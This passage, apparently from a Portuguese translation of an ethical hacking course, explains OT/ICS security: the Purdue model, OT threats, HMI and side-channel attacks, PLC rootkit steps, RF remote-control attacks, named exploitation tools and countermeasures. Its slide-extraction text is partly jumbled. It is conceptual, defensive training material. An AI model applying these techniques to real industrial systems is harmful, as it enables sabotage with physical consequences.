ÿ Mitigação de riscos: a fusão desses dois campos pode melhorar a produtividade geral, segurança,
e confiabilidade, além de garantir escalabilidade.
Figura 10.16: Convergência IT/OT

O Modelo Purdue
ÿ O modelo Purdue é derivado do Purdue Enterprise Reference
Modelo de arquitetura (PERA), amplamente utilizado para descrever
conexões internas e dependências de componentes importantes nas redes ICS
ÿ É composto por três zonas
Sistemas de TI Nível 5 Rede Corporativa

(Empreendimento
Nível 4 Sistemas de Logística Empresarial
Zona)
Zona Industrial Desmilitarizada (IDMZ)
Nível 3 Sistemas Operacionais/Operações Locais

OT
Sistemas Nível 2 Sistemas de Controle/Controles de Supervisão de Área
(Fabricado
Nível 1 Controles Básicos/Dispositivos Inteligentes
Zona)
Nível 0 Processo Físico
O Modelo Purdue
O modelo Purdue é derivado do modelo Purdue Enterprise Reference Architecture (PERA), que
é um modelo conceitual amplamente utilizado que descreve as conexões internas e dependências
de componentes importantes em redes ICS. O modelo Purdue também é conhecido como modelo
de referência do Sistema de Controle e Automação Industrial.
O modelo Purdue consiste em três zonas: a zona de manufatura (OT) e a zona empresarial (IT),
separadas por uma zona desmilitarizada (DMZ), que é usada para restringir a comunicação direta
entre os sistemas OT e IT. A intenção por trás da adição dessa camada extra é limitar os
comprometimentos da rede ou do sistema dentro dessa camada e fornecer produção ininterrupta.
As três zonas são divididas em vários níveis operacionais. Cada zona, com níveis associados, é
descrita abaixo:
Figura 10.17: Modelo de Purdue

ÿ Enterprise Zone (Sistemas de TI)
A zona de segurança corporativa é uma parte da TI, na qual o gerenciamento e o agendamento da cadeia de
suprimentos são realizados usando sistemas de negócios como SAP e ERP. Ele também localiza os
datacenters, usuários e acesso à nuvem. A zona empresarial consiste em dois níveis.
o Nível 5 (Rede Empresarial)
Esta é uma rede de nível corporativo onde são realizadas operações de negócios como serviços B2B
(business to business) e B2C (business to customer). A conectividade e o gerenciamento da Internet
podem ser tratados nesse nível. Os sistemas de rede corporativa também acumulam dados de todos os
subsistemas localizados nas fábricas individuais para relatar o estoque e o status geral da produção.
o Nível 4 (Sistemas de Logística Empresarial)
Todos os sistemas de TI que suportam o processo de produção na fábrica estão neste nível.
O gerenciamento de cronogramas, planejamento e outras logísticas das operações de fabricação são
realizados aqui. Os sistemas de nível 4 incluem servidores de aplicativos, servidores de arquivos,
servidores de banco de dados, sistemas de supervisão, clientes de e-mail, etc.
ÿ Zona de Fabricação (Sistemas OT)
Todos os dispositivos, redes, controle e sistemas de monitoramento residem nesta zona. A zona de fabricação
consiste em quatro níveis.
o Nível 3 (Sistemas Operacionais/Operações do Site)
Neste nível, são definidas as funções de gerenciamento da produção, monitoramento individual da

planta e funções de controle. Fluxos de trabalho de produção e saída do produto desejado são
assegurados neste nível. O gerenciamento de produção inclui sistemas de gerenciamento de
desempenho da fábrica, programação de produção, gerenciamento de lotes, garantia de qualidade,
historiadores de dados, sistemas de gerenciamento de operação/execução de fabricação (MES/MOMS),
laboratórios e otimização de processos. Detalhes de produção de níveis inferiores são coletados aqui e
podem então ser transferidos para níveis superiores ou podem ser instruídos por sistemas de nível
superior.
o Nível 2 (Sistemas de Controle/Controles de Supervisão de Área)
Supervisão, monitoramento e controle do processo físico são realizados neste nível. Os sistemas de
controle podem ser DCSs, software SCADA, Interfaces Homem-Máquina (HMIs), software em tempo
real e outros sistemas de controle de supervisão, como trabalhos de engenharia e controle de linha PLC.
o Nível 1 (Controles Básicos/Dispositivos Inteligentes)
A análise e alteração do processo físico podem ser feitas neste nível. As operações no controle básico
incluem “motores de partida”, “válvulas abertas”, “atuadores de movimento” etc. Os sistemas de nível 1
incluem analisadores, sensores de processo e outros sistemas de instrumentação, como dispositivos
eletrônicos inteligentes (IEDs), PLCs, RTUs, proporcional Controladores de derivação integral (PID),
equipamento sob controle (EUC) e variável

Frequency Drives (VFDs). O CLP foi utilizado no nível 2 com função supervisória, mas é utilizado
como função de controle no nível 1.
o Nível 0 (Processo Físico)
Neste nível, o processo físico real é definido e o produto é fabricado.

Os níveis superiores controlam e monitoram as operações neste nível; portanto, essa camada
também é conhecida como Equipamento sob controle (EUC). Os sistemas de nível 0 incluem
dispositivos, sensores (por exemplo, velocidade, temperatura, pressão), atuadores ou outros
equipamentos industriais usados para realizar a fabricação ou operações industriais. Um
pequeno erro em qualquer um dos dispositivos neste nível pode afetar as operações gerais.
ÿ Zona Industrial Desmilitarizada (IDMZ)
A zona desmilitarizada é uma barreira entre a zona de fabricação (sistemas OT) e a zona empresarial
(sistemas de TI) que permite uma conexão de rede segura entre os dois sistemas. A zona é criada
para inspecionar a arquitetura geral. Se algum erro ou intrusão comprometer os sistemas de trabalho,
o IDMZ retém o erro e permite que a produção continue sem interrupção. Os sistemas IDMZ incluem
controladores de domínio da Microsoft, servidores de replicação de banco de dados e servidores
proxy.

Fluxo do módulo
Entenda OT
1
Conceitos
2 e Ataques
Discutir ataque OT
3
Contramedidas
Discutir ameaças e ataques OT
Com a evolução das ameaças de segurança e da postura de segurança das organizações que usam OT, as
organizações precisam atribuir a máxima importância à segurança OT e adotar estratégias apropriadas para
lidar com problemas de segurança devido à convergência OT/TI. Esta seção discute várias ameaças e ataques
OT, como invasão de redes industriais, ataques de IHM, ataques de canal lateral, invasão de PLCs, invasão
de máquinas industriais por meio de controladores remotos de RF, etc.

Desafios do TO
1 falta de visibilidade 7 Ritmo rápido de mudança
2 Senhas de texto simples 8 Sistemas desatualizados
3 Complexidade da rede 9 modernização aleatória
4 Tecnologia herdada 10 Convergência com TI
Redes de produção únicas /

5 Falta de proteção antivírus 11 Software proprietário
Falta de profissionais de Protocolos de comunicação

6 segurança qualificados 12 vulneráveis
Desafios da OT A OT
desempenha um papel vital em vários setores de infraestrutura crítica, como usinas de energia, serviços públicos
de água e saúde. Absurdamente, a maioria dos sistemas OT são executados em versões antigas de software e
usam hardware obsoleto, o que os torna vulneráveis a explorações maliciosas como phishing, espionagem,
ataques de ransomware etc. Esses tipos de ataques podem ser devastadores para produtos e serviços. Para
reduzir essas vulnerabilidades, o sistema OT deve empregar exame crítico em áreas-chave de vulnerabilidade
usando várias ferramentas e táticas de segurança.
Discutidos abaixo estão alguns dos desafios e riscos para OT que o torna vulnerável a muitas ameaças:
ÿ Falta de visibilidade: A visibilidade mais ampla da segurança cibernética na rede OT alcança maior
segurança e, portanto, pode-se responder rapidamente a quaisquer ameaças potenciais. No entanto, a
maioria das organizações não tem visibilidade clara da segurança cibernética, tornando difícil para as
equipes de segurança detectar comportamentos e assinaturas incomuns.
ÿ Senhas de texto simples: A maioria das redes de sites industriais usa senhas fracas ou de texto simples.
As senhas de texto simples levam a uma autenticação fraca, que por sua vez deixa os sistemas
vulneráveis a vários ataques de reconhecimento cibernético.
ÿ Complexidade da rede: a maioria dos ambientes de rede OT é complexa devido à composição de vários
dispositivos, cada um com diferentes necessidades e requisitos de segurança.
ÿ Tecnologia legada: os sistemas OT geralmente usam tecnologias mais antigas sem medidas de segurança
apropriadas, como criptografia e proteção por senha, deixando-os vulneráveis a vários ataques. Aplicar
práticas de segurança modernas também é um desafio.

ÿ Falta de proteção antivírus: Indústrias que utilizam tecnologia legada e sistemas desatualizados não possuem
nenhuma proteção antivírus, que pode atualizar as assinaturas automaticamente, tornando-as vulneráveis a
infecções por malware.
ÿ Falta de profissionais de segurança qualificados: A lacuna de habilidades de segurança cibernética representa

uma grande ameaça para as organizações, pois faltam profissionais de segurança qualificados para descobrir
ameaças e implementar novos controles e defesas de segurança nas redes.
ÿ Ritmo acelerado de mudança: Manter o ritmo de mudança é o maior desafio na área de segurança, e a lenta
transformação digital também pode comprometer os sistemas OT.
ÿ Sistemas desatualizados: a maioria dos dispositivos OT, como PLCs, usa firmware desatualizado, tornando-os
vulneráveis a muitos ataques cibernéticos modernos.
ÿ Modernização aleatória: À medida que a demanda por OT cresce, ela deve se manter atualizada com as
tecnologias mais recentes. No entanto, devido ao uso de componentes legados na atualização e correção do
sistema OT, a atualização do sistema pode levar vários anos, o que pode afetar adversamente várias
operações.
ÿ Conexões inseguras: sistemas OT se comunicam por Wi-Fi público e conexões Wi-Fi não criptografadas na
rede de TI para transferência de dados de controle, tornando-os suscetíveis a ataques man-in-the-middle.
ÿ Uso de dispositivos não autorizados: Muitos locais industriais têm dispositivos desconhecidos ou não autorizados
conectados às suas redes, que são vulneráveis a vários ataques.
ÿ Convergência com TI: OT se conecta principalmente com a rede corporativa; como resultado, é vulnerável a
vários ataques de malware e pessoas mal-intencionadas. Além disso, os sistemas OT são habilitados para TI
e a equipe de segurança de TI não tem muita experiência com os sistemas e protocolos OT.
ÿ Desafios organizacionais: muitas organizações implementam e mantêm diferentes arquiteturas de segurança

que atendem às necessidades de TI e OT. Isso pode criar algumas falhas no gerenciamento de segurança,
deixando maneiras para que os invasores invadam os sistemas facilmente.
ÿ Redes de produção exclusivas/software proprietário: as indústrias seguem configurações exclusivas de

hardware e software que dependem dos padrões da indústria e de demandas operacionais explícitas. O uso
de software proprietário dificulta a atualização e o patch do firmware, pois vários fornecedores o controlam.
ÿ Protocolos de comunicação vulneráveis: OT usa protocolos de comunicação como Modbus e Profinet para
supervisionar, controlar e conectar diferentes mecanismos, como controladores, atuadores e sensores. Esses
protocolos carecem de recursos de segurança integrados, como autenticação, detecção de falhas ou detecção
de comportamento anormal, tornando-os vulneráveis a vários ataques.
ÿ Protocolos de gerenciamento remoto: sites industriais usam protocolos de gerenciamento remoto, como RDP,
VNC e SSH. Depois que o invasor compromete e obtém acesso à rede OT, ele pode realizar uma exploração
adicional para entender e manipular a configuração e o funcionamento do equipamento.

Ameaças OT
01 Manutenção e Ameaça Administrativa
02 Vazamento de Dados
03 Abuso de protocolo
04 Potencial Destruição dos Recursos do ICS
05 Ataques de Reconhecimento
06 Ataques de negação de serviço
Ameaças OT (continuação)
07 08 09 10
Ataques baseados em HMI Explorando a empresa Spear Phishing Ataques de malware
Sistemas e Ferramentas Específicas
11 12 13 14
Explorando sem correção Ataques de Canal Lateral estouro de buffer Explorando o controle remoto de RF
Vulnerabilidades Ataques controladores
Ameaças OT
Com a convergência de TO e TI, os sistemas de TO estão sendo usados para fins para os quais não foram originalmente
projetados. Os sistemas OT estão sendo integrados e interconectados com redes de TI e estão sendo expostos à
Internet, que é global. A maioria dos sistemas OT usa software legado e desatualizado sem segurança, deixando um
possível gateway para os cibercriminosos obterem acesso a redes corporativas de TI e infraestrutura OT. Além disso,
as redes OT conectam

todas as máquinas e infraestrutura de produção, levando a ataques cibernéticos complexos e sofisticados que
causam até mesmo danos físicos.
Discutidas abaixo estão algumas das ameaças importantes enfrentadas pelas redes OT:
ÿ Ameaça administrativa e de manutenção: Os invasores exploram vulnerabilidades de dia zero para

direcionar a manutenção e administração da rede OT. Ao explorar essas vulnerabilidades, os invasores
injetam e espalham malware nos sistemas de TI e visam os sistemas de controle industrial conectados,
como SCADA e PLC.
ÿ Vazamento de dados: os invasores podem explorar os sistemas de TI conectados à rede OT para obter
acesso ao gateway IT/OT e roubar dados operacionalmente significativos, como arquivos de configuração.
ÿ Abuso de protocolo: devido a problemas de compatibilidade, muitos sistemas OT usam protocolos e

interfaces legados desatualizados, como Modbus e barramento CAN. Os invasores exploram esses
protocolos e interfaces para realizar vários ataques em sistemas OT. Por exemplo, os invasores podem
abusar da parada de emergência (e-stop), que é um mecanismo de segurança usado para desligar o
maquinário em emergências para executar ataques de pacote único.
ÿ Destruição potencial de recursos ICS: Os invasores exploram vulnerabilidades nos sistemas OT para
interromper ou degradar a funcionalidade da infraestrutura OT, levando a problemas críticos de vida e
segurança.
ÿ Ataques de Reconhecimento: Os sistemas OT permitem a comunicação remota com o mínimo ou nenhum

mecanismo de criptografia ou autenticação. Os invasores podem realizar o reconhecimento inicial e a
varredura na infraestrutura OT de destino para coletar as informações necessárias para os estágios
posteriores do ataque.
ÿ Ataques de negação de serviço: os invasores exploram protocolos de comunicação, como o Protocolo

Industrial Comum (CIP), para realizar ataques DoS nos sistemas OT de destino. Por exemplo, um invasor
pode enviar uma solicitação de conexão CIP maliciosa para um dispositivo de destino; uma vez
estabelecida a conexão, ele/ela pode enviar uma configuração de IP falsa para o dispositivo; se o
dispositivo aceitar a configuração, pode ocorrer perda de comunicação entre o dispositivo e outros
sistemas conectados.
ÿ Ataques baseados em HMI: As interfaces homem-máquina (HMIs) são freqüentemente chamadas de

interfaces hacker-máquina. Mesmo com o avanço e a automação da OT, a interação humana e o controle
sobre o processo operacional continuam sendo desafios devido às vulnerabilidades subjacentes. A falta
de padrões globais para o desenvolvimento de software HMI sem nenhuma medida de segurança de
defesa em profundidade leva a muitos problemas de segurança.
Os invasores exploram essas vulnerabilidades para realizar vários ataques, como corrupção de memória,
injeção de código, escalonamento de privilégios etc. nos sistemas OT de destino.
ÿ Exploração de sistemas e ferramentas específicos da empresa: os invasores podem direcionar

dispositivos ICS, como Safety Instrumented Systems (SIS) para injetar malware, explorando protocolos
subjacentes para detectar hardware e sistemas usados em comunicações e interromper ou danificar
ainda mais seus serviços.

ÿ Spear Phishing: Os invasores enviam e-mails falsos contendo links ou anexos maliciosos, aparentemente
originados de fontes legítimas ou bem conhecidas para a vítima. Quando a vítima clica no link ou baixa o
anexo, ele injeta malware, começa a danificar os recursos e se espalha para outros sistemas. Por
exemplo, um invasor envia um e-mail fraudulento com um anexo malicioso para um sistema vítima que
mantém o software de vendas da planta operacional. Quando a vítima baixa o anexo, o malware é
injetado no software de vendas, se propaga para outros sistemas em rede e, finalmente, danifica os
componentes de automação industrial.
ÿ Ataques de malware: os invasores estão reutilizando pacotes legados de malware que eram usados
anteriormente para explorar sistemas de TI para explorar sistemas OT. Eles realizam ataques de
reconhecimento para identificar vulnerabilidades em sistemas OT recém-conectados. Depois de detectar
vulnerabilidades, eles reutilizam as versões mais antigas do malware para realizar vários ataques aos
sistemas OT. Em alguns cenários, os invasores também desenvolvem malware visando sistemas OT,
como ICS/SCADA.
ÿ Exploração de vulnerabilidades não corrigidas: os invasores exploram vulnerabilidades não corrigidas

em produtos ICS, firmware e outros softwares usados em redes OT. Os fornecedores de ICS desenvolvem
produtos que são confiáveis e oferecem desempenho de alta velocidade em tempo real, sem recursos
de segurança integrados. Além disso, esses fornecedores não podem desenvolver patches para as
vulnerabilidades identificadas com a mesma velocidade dos fornecedores de TI. Por esses motivos, os
invasores visam e exploram as vulnerabilidades do ICS para realizar vários ataques em redes OT.
ÿ Ataques de canal lateral: Os invasores realizam ataques de canal lateral para recuperar informações
críticas de um sistema OT observando sua implementação física. Os invasores usam várias técnicas,
como análise de tempo e análise de poder, para realizar ataques de canal lateral.
ÿ Ataque de estouro de buffer: O invasor explora várias vulnerabilidades de estouro de buffer que existem
no software ICS, como interface web HMI, cliente web ICS, interfaces de comunicação, etc., para injetar
dados e comandos maliciosos para modificar o comportamento normal e a operação dos sistemas .
ÿ Explorando controladores remotos de RF: redes OT usam tecnologia de RF para controlar várias
operações industriais remotamente. Os protocolos de comunicação de RF carecem de segurança
integrada para comunicação remota. Vulnerabilidades nesses protocolos podem ser exploradas pelos
invasores para realizar vários ataques em máquinas industriais que levam à sabotagem da produção,
controle do sistema e acesso não autorizado.

Ataques baseados em HMI
Os invasores geralmente tentam comprometer o sistema HMI, pois é o hub principal que controla a infraestrutura crítica
Os invasores obtêm acesso aos sistemas HMI para causar danos físicos aos dispositivos SCADA ou coletar informações
confidenciais relacionadas à arquitetura crítica
Vulnerabilidades SCADA exploradas por invasores para realizar ataques baseados em HMI:
Corrupção de memória 01 03 Gerenciamento de credenciais
Falta de autorização/autenticação e padrões

inseguros 02 04 Injeção de código
Ataques OT
Ataques baseados em HMI
Os invasores geralmente tentam comprometer um sistema HMI, pois é o hub principal que controla a infraestrutura
crítica. Se os invasores obtiverem acesso por meio de sistemas HMI, eles podem causar danos físicos aos dispositivos
SCADA ou coletar informações confidenciais relacionadas à arquitetura crítica que podem ser usadas posteriormente
para executar atividades maliciosas. Usando essas informações, os invasores podem desabilitar as notificações de
alerta de ameaças recebidas nos sistemas SCADA.
Discutidas abaixo estão várias vulnerabilidades do SCADA exploradas por invasores para realizar ataques baseados
em HMI em sistemas de controle industrial:
ÿ Corrupção de Memória
As vulnerabilidades nesta categoria são problemas de segurança de código que incluem vulnerabilidades de
leitura/gravação fora do limite e estouro de buffer baseado em heap e pilha. Em uma HMI, a corrupção da
memória ocorre quando o conteúdo da memória é alterado devido a erros residentes no código. Quando
esses conteúdos de memória alterados são usados, o programa falha ou executa execuções não intencionais.
Os invasores podem realizar tarefas de corrupção de memória simplesmente substituindo o código para
causar um estouro de buffer. Às vezes, a pilha não liberada também pode permitir que os invasores usem a
manipulação de strings para abusar do programa.
ÿ Gestão de Credenciais
As vulnerabilidades nesta categoria incluem o uso de senhas codificadas, salvamento de credenciais em

formatos simples, como texto não criptografado, e proteção inadequada de credenciais.
Essas vulnerabilidades podem ser exploradas pelos invasores para obter acesso administrativo aos sistemas
e alterar os bancos de dados do sistema ou outras configurações.

ÿ Falta de Autorização/Autenticação e Padrões Inseguros
As vulnerabilidades nesta categoria incluem transmissão de informações confidenciais em texto não

criptografado, padrões inseguros, falta de criptografia e controles ActiveX inseguros usados para
scripts. Um autêntico administrador da solução SCADA pode visualizar e acessar as senhas de outros
usuários. Os invasores podem explorar essas vulnerabilidades para obter acesso ilegal ao sistema de
destino e registrar ou manipular ainda mais as informações que estão sendo transmitidas ou
armazenadas.
ÿ Injeção de Código
As vulnerabilidades nesta categoria incluem injeções de código comuns, como SQL, SO, comando e
algumas injeções específicas de domínio. O script Gamma é uma das linguagens específicas de
domínio proeminentes para HMIs que é propensa a ataques de injeção de código. Este script foi
projetado para desenvolver aplicativos de controle e interface do usuário de fase rápida. Uma
vulnerabilidade EvalExpression (avaliar, compilar e executar código em tempo de execução) no script
Gamma pode ser explorada por invasores para enviar e executar scripts ou comandos arbitrários
controlados no sistema SCADA de destino.

Ataques de Canal Lateral
Os invasores executam um
ataque de canal lateral
monitorando sua
implementação física para
Osciloscópio ou
obter informações críticas de um
Equipamento de medição
sistema alvo
Sonda
Os invasores usam Computador do

invasor com análise
duas técnicas, a saber,
Programas
análise de tempo e análise
de energia para realizar
ataques de canal lateral no
sistemas OT alvo
Vítima Alvo Sistema SCADA
Ataques de canal lateral (continuação)
Análise de tempo Análise de poder
ÿ Monitoramento dos atacantes ÿ Os atacantes observam o

a quantidade de tempo mudança no
que o dispositivo está consumo de energia
levando para concluir dos semicondutores durante
uma autenticação de os ciclos de clock ÿ Ao
senha completa
observar o perfil de energia, um
processo caractere da senha pode ser
para determinar o
recuperado comparando o
número de caracteres
caractere correto com o
corretos caractere errado
Ataques de Canal Lateral
Os invasores executam um ataque de canal lateral monitorando sua implementação física para obter informações
críticas de um sistema de destino. Os invasores usam duas técnicas, a saber, análise de tempo e análise de potência,
para realizar ataques de canal lateral nos sistemas OT de destino. O ataque de análise de tempo é baseado na
quantidade de tempo que o dispositivo leva para executar diferentes cálculos. O ataque de análise de energia é
baseado na mudança no consumo de energia durante uma operação criptográfica.

Os sistemas ICS geralmente são vulneráveis a esses dois ataques de canal lateral.
ÿ Análise de tempo
As senhas geralmente são transmitidas por meio de um canal serial. Os invasores empregam uma estratégia
de loop para recuperar essas senhas. Eles usam um caractere por vez para verificar se o primeiro caractere
digitado está correto; em caso afirmativo, o loop continua para caracteres consecutivos. Caso contrário, o
loop termina. Os invasores verificam quanto tempo o dispositivo está levando para concluir um processo
completo de autenticação de senha, por meio do qual podem determinar quantos caracteres inseridos estão
corretos. Os ataques baseados em tempo podem ser facilmente detectados e bloqueados.
ÿ Análise de Potência
Ataques de análise de poder são difíceis de detectar; o dispositivo atacado pode operar mesmo depois de
infectado. Portanto, os invasores geralmente preferem executar um ataque de análise de poder em vez de
um baseado em tempo para recuperar as informações confidenciais.
Este ataque é realizado observando a mudança no consumo de energia dos semicondutores durante os ciclos
de clock. O osciloscópio observa o intervalo de tempo entre dois pulsos por meio da ponta de prova. O perfil
de potência formado pelos sinais pode deixar uma pista de como os dados estão sendo processados.
Por exemplo, observando o perfil de energia, um caractere da senha pode ser recuperado quando o caractere
correto digitado é comparado com o caractere errado.
A chave criptográfica também pode ser obtida usando o mesmo método. Os invasores podem obter acesso
físico ao dispositivo desprotegido ou não supervisionado. Em seguida, eles usam um osciloscópio e um
dispositivo de hardware especial que roda no software de análise para recuperar as chaves criptográficas.
Os invasores podem usar as chaves recuperadas para fazer alterações na configuração dos dispositivos analisados.
Como esses sistemas são utilizados principalmente na proteção das redes elétricas, as alterações de configuração
podem ter impactos devastadores. Por meio dessas alterações, os invasores podem atrapalhar o processo do sistema
ou usá-lo para transferir dados incorretos para o operador. Esses dispositivos geralmente são distribuídos e gerenciados
por um sistema centralizado. Dados incorretos de um dispositivo podem afetar partes importantes da rede OT.

Figura 10.18: Ilustração do ataque de canal lateral

Hackear Controlador Lógico Programável (PLC)

ÿ Controladores lógicos programáveis (PLCs) são suscetíveis a ataques cibernéticos, pois são
usados para controlar os processos físicos da infraestrutura crítica
ÿ Os invasores identificam PLCs expostos à Internet usando ferramentas online como Shodan
ÿ Os invasores podem adulterar a integridade e a disponibilidade dos sistemas PLC explorando o controle de pinos
operações
Ataque de rootkit PLC

Consequências
Etapa 1: obter acesso

O invasor obtém acesso root ao Atacante manipula as operações
PLC do CLP
1.1 Obtém acesso autorizado ao
PLC injetando rootkit
Etapa de Ataque 2 Etapa de Ataque 3
1.2 Lança ataque de fluxo de O invasor mapeia I/O para

O invasor modifica a sequência
controle contra o tempo de execução do PLC depurar o registro e intercepta
de inicialização de E/S
operações R/W
1.3 Obtém acesso ao PLC

Condição prévia
adivinhando a senha padrão
O invasor identifica o O invasor identifica o mapeamento
processo físico controlado por entre os pinos de E/S e a lógica
CLP do CLP
Hackear Controlador Lógico Programável (PLC)
Os PLCs são suscetíveis a ataques cibernéticos, pois são usados para controlar os processos físicos
das infraestruturas críticas. Os invasores identificam PLCs expostos à Internet usando ferramentas online
como Shodan. PLCs comprometidos podem representar uma séria ameaça à segurança das organizações.
Os invasores podem adulterar a integridade e a disponibilidade dos sistemas PLC explorando operações
de controle de pinos e podem lançar ataques como sabotagens de carga útil e rootkits PLC.
Figura 10.19: Hacking PLC através de ataque de rootkit PLC

Etapas usadas para executar um ataque de rootkit PLC:
ÿ Etapa 1: O invasor obtém acesso autorizado ao dispositivo PLC injetando um rootkit. Em seguida, ele executa um
ataque de fluxo de controle contra o tempo de execução do PLC para adivinhar a senha padrão e obter acesso de
nível raiz ao PLC.
ÿ Etapa 2: Agora, o invasor mapeia os módulos de entrada e saída junto com suas localizações na memória para
sobrescrever os parâmetros do CLP de entrada e saída.
ÿ Passo 3: Depois de aprender sobre os pinos de I/O e o mapeamento lógico do PLC, o invasor manipula a sequência
de inicialização de I/O, assumindo assim o controle total sobre as operações do PLC.
Um rootkit PLC pode fazer uso das falhas arquitetônicas nos microprocessadores e ignorar os mecanismos modernos de
detecção. Usando este ataque, o invasor pode obter controle total do processamento de entrada e saída do PLC, manipulando
a inicialização de E/S. Um ataque de rootkit PLC também é chamado de ataque fantasma de PLC. Para realizar esse ataque,
os invasores precisam de um conhecimento profundo da arquitetura do PLC.
A UCP do CP opera em dois modos, ou seja, modo programação e modo execução. No modo de programação, o PLC pode
baixar remotamente o código de qualquer computador, e o modo de execução é usado para executar o código real. Depois
de obter acesso ao PLC, os invasores podem baixar o código do malware para o PLC armazenado pela CPU. Este código
malicioso é executado no lugar do código original. Agora, o invasor manipula a entrada e a saída para obter controle total
sobre os dispositivos mecânicos e danificar ou destruir ainda mais sua operação.

Hackeando sistemas industriais por meio de controladores remotos de RF
Replay Attack
Os invasores gravam os comandos transmitidos por um operador
e os reproduzem no sistema de destino para obter controle básico
ÿ A maioria das máquinas industriais são sobre o sistema
operado por meio de controladores remotos
que são usados em vários setores, como
Faixa de transmissão
manufatura, logística, mineração e construções
Alvo
para automação ou para Máquina (RX)
Registro
máquinas de controle Comandos
Operador
Atacante
Texas RX
Capturar
Dados
ÿ Implementações de segurança inadequadas
transmite
nos dispositivos que operam via controladores Gravado
Comandos
remotos podem representar sérios riscos
aos sistemas industriais Comandos Atacante
Hackeando Sistemas Industriais através de

Controladores remotos de RF (continuação)
Injeção de comando
Os invasores alteram pacotes de RF ou injetam seus próprios pacotes
empregando técnicas de engenharia reversa para obter acesso completo à máquina alvo
Faixa de transmissão Alvo

Máquina (RX)
Registro
Comandos
Operador
Atacante RX
Texas
Capturar
Dados
Obter outro transmitir outro

Comandos Comandos
Reversão off-line
Engenharia Atacante

Hacking de Sistemas Industriais através de RF

Controles remotos (continuação)
Reemparelhamento com controlador de RF malicioso
ÿ Os invasores sequestram o controle remoto original e o emparelham com a máquina
usando um controlador de RF malicioso, que eles disfarçam como legítimo
Emparelhamento Capturar dados

Atacante
Seqüência
TX2
Mover
Antes Operador
Ataque
TX1
RX
Alvo
Máquina (RX)
Depois de
Ataque Repetir
Operador Atacante
TX1 (não emparelhado)
(par)
Faixa de transmissão
Hackeando sistemas industriais por

meio de controle remoto de RF
Controladores (continuação)
R
x
Máquina alvo
(RX)
Ataque de Reprogramação Maliciosa

ÿ Os invasores injetam malware no firmware dos
controladores remotos para manter um acesso
persistente e completamente remoto ao sistema
firmware
Hackeando sistemas industriais por meio de controladores remotos de RF

A maioria das máquinas industriais é operada por meio de controladores remotos. Esses
controladores remotos são usados em vários setores, como manufatura, logística, mineração e
construção, para automação ou controle de máquinas. Os dispositivos em uma rede usam um
transmissor (TX) e um receptor (RX) para se comunicarem entre si. Enquanto o transmissor (TX)
passa comandos de rádio (através de botões), o receptor (TX) reage aos comandos correspondentes. segurança im

as implementações em dispositivos que operam por meio de controladores remotos podem representar sérios riscos de segurança
para sistemas industriais.
Os invasores podem ficar dentro do raio do sistema de destino e usar um dispositivo do tipo transceptor de rádio especialmente
projetado. O dispositivo ajuda os invasores a projetar seus próprios pacotes e enviá-los em uma rede para obter acesso ao sistema
industrial e realizar várias atividades maliciosas.
Abaixo estão listadas as ameaças que os sistemas industriais geralmente enfrentam por meio de controladores remotos de RF:
ÿ Replay Attack
Os invasores gravam os comandos (pacotes de RF) transmitidos por um operador e os reproduzem no sistema de destino
para obter controle básico sobre o sistema.
Figura 10.20: Ataque de repetição em sistemas industriais
ÿ Injeção de Comando
Conhecendo os protocolos de RF, os invasores podem alterar os pacotes de RF ou injetar seus próprios pacotes
empregando técnicas de engenharia reversa para obter acesso completo à máquina.
Os invasores capturam e gravam comandos, executam engenharia reversa para derivar outros comandos usados para
controlar o dispositivo de destino e injetam esses comandos para manipular a operação normal do dispositivo de destino.
Figura 10.21: Ataque de injeção de comando em sistemas industriais

ÿ Abusar da paragem de emergência
Usando as informações acima, o invasor pode enviar vários comandos de parada de emergência (parada de
emergência) ao dispositivo de destino para causar DoS.
Figura 10.22: Abusando do e-stop para executar um ataque DoS
ÿ Reemparelhamento com controlador de RF malicioso
Um invasor pode sequestrar o controle remoto original e fazer par com a máquina usando um controlador de RF
malicioso, disfarçado de legítimo. Os invasores enviam solicitações maliciosas para emparelhar com controladores
de RF de destino, capturar a sequência de comandos, sequestrar o controlador legítimo e usar um controlador
malicioso para realizar vários ataques no dispositivo de destino.
Figura 10.23: Ataque de emparelhamento malicioso em uma máquina industrial

ÿ Ataque de Reprogramação Maliciosa

Os invasores podem injetar malware no firmware em execução nos controladores remotos
para manter o acesso remoto persistente e completo ao sistema industrial de destino.
Figura 10.24: Ataque de reprogramação maliciosa em uma máquina industrial

Ferramentas de Ataque OT
Estrutura de exploração ICS (ISF)

Ferramenta de desligamento
ICS Exploitation Framework (ISF) é uma estrutura de exploração baseada em SCADA https:// github.com
Python e é como o framework Metasploit
GRASSMARLIN
https:// github.com
Metasploit
modbus-cli
https:// github.com
PLCinject
https:// github.com
https:// github.com
Ferramentas de Ataque OT
A seguir, são discutidas várias ferramentas usadas pelos invasores para invadir sistemas e redes OT:
ÿ ICS Exploitation Framework (ISF)
O ICS Exploitation Framework (ISF) é um framework de exploração baseado em Python que é similar
ao framework Metasploit. Essa ferramenta fornece vários módulos de exploração que permitem que
invasores invadam sistemas e redes ICS de destino.
Figura 10.25: Captura de tela do ICS Exploitation Framework (ISF)

Listadas abaixo estão algumas das ferramentas adicionais para invadir sistemas e redes OT:
ÿ Ferramenta de desligamento SCADA (https:// github.com)
ÿ GRASSMARLIN (https:// github.com)
ÿ modbus-cli (https:// github.com)
ÿ PLCinject (https:// github.com)

Fluxo do módulo
Entenda OT
1
Conceitos
2 e Ataques
Discutir ataque OT
3
Contramedidas
Discutir contramedidas de ataque OT
Esta seção discute várias medidas de segurança OT e ferramentas de segurança OT. Seguindo as medidas
de segurança, as organizações podem implementar mecanismos de segurança adequados para proteger a
infraestrutura industrial crítica e os sistemas de TI associados de vários ataques cibernéticos.

Contramedidas de Ataque OT
1 2 3 4
Use sensores Atualize os sistemas com as Implemente configuração Manter um ativo
específicos para descobrir tecnologias mais recentes e segura e práticas de registre -se para rastrear e
vulnerabilidades na rede corrija os sistemas regularmente codificação seguras para examinar sistemas
aplicativos OT desatualizados
5 6 7 8
Use senhas fortes e altere Acesso remoto seguro por Proteja os sistemas Use apenas servidores
as senhas padrão de fábrica meio de várias camadas de desativando serviços e da Web de terceiros testados
defesa implementando VPNs funcionalidades não utilizados e conhecidos para atender
aplicativos da Web do ICS
Contramedidas de Ataque OT
Siga as contramedidas discutidas abaixo para se defender contra o hacking OT:
ÿ Realizar regularmente uma avaliação de risco para reduzir a exposição ao risco atual
ÿ Use sensores específicos para descobrir as vulnerabilidades na rede de forma inativa
ÿ Incorporar inteligência de ameaças para descobrir ameaças e proteger ativos priorizando OT

remendos
ÿ Atualize regularmente ferramentas de hardware e software OT
ÿ Desativar portas e serviços não utilizados
